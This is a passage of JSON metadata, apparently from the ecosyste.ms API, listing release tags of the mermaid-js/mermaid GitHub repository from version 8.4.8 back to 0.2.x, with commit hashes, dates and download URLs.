e.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.